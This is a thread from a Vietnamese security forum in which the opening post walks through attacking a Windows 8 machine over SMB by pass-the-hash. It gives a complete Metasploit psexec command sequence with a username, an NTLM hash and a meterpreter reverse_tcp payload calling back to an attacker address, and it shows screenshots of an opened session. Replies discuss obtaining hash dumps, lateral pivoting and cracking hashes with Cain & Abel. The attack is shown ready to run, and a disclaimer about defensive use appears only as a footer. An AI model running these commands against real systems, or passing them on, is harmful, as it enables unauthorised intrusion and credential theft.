Tấn công Windows 8 qua SMB service sử dụng Hash Password

DDos

VIP Members
22/10/2013
524
2.189 bài viết
Tấn công Windows 8 qua SMB service sử dụng Hash Password
Sử dụng một password hash dump trước khi bạn nhận được kết nối từ xa tới máy tính nạn nhân sử dụng SMB PSEXEC.

Code:

#msfconsole
msf > use windows/smb/psexec
msf exploit(psexec) > set smbuser Lk
msf exploit(psexec) > set smbpass e52cac67419a9a224a3b108f3fa6cb6d
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost 192.168.10.129
msf exploit(psexec) > set lport 1122
msf exploit(psexec) > set rhost 10.10.2.2
msf exploit(psexec) > exploit

- Chạy metasploit:


1.png

- Payload & Exploit:

2.png

- Meterpreter Session đã được mở:

3.png
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

cho e hỏi là cái password hash dump lấy đâu ra thế
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

vipkute2703;10194 đã viết:
cho e hỏi là cái password hash dump lấy đâu ra thế
Lấy từ máy tính mục tiêu bằng một cách nào đó... :D
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

Thế thì kug như nhau. z là mình phải tiếp cận đc với máy mục tiêu trước ah
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

Cái này nói cụ thể hơn thì là pivoting, trong một hệ thống mạng nội bộ, các máy tính sử dụng cùng một password.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

Anh cho e hỏi e lấy được pass hashdump rồi thì cần phải có những gì mới có thể crack pas được ? Em dùng findmyhash hay icrack online đều không được.
Anh giúp em với.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

tiendatdtvt;17718 đã viết:
Anh cho e hỏi e lấy được pass hashdump rồi thì cần phải có những gì mới có thể crack pas được ? Em dùng findmyhash hay icrack online đều không được.
Anh giúp em với.
bạn muốn tìm ra mật khẩu dạng cleartext à?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

DDos;17727 đã viết:
bạn muốn tìm ra mật khẩu dạng cleartext à?
E tấn công lấy được pass hash giờ dùng gì để giải mã đó ra cleartext ạ ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

tiendatdtvt;17817 đã viết:
E tấn công lấy được pass hash giờ dùng gì để giải mã đó ra cleartext ạ ?
Bạn có thể sử dụng các Tool giải mã, ví dụ tính năng Crack Passwork trong Cain&Albel. Tuy nhiên việc giải mã có thành công hay không phụ thuộc rất nhiều yếu tố. Ví dụ độ mạnh của password, việc bạn đoán được mật khẩu có bao nhiêu ký tự, khả năng có những ký tự gì v.v
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Tấn công Windows 8 qua SMB service sử dụng Hash Password

Bài chia sẽ của bạn rất ý nghĩa
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thẻ
hash password smb service windows 8
Bên trên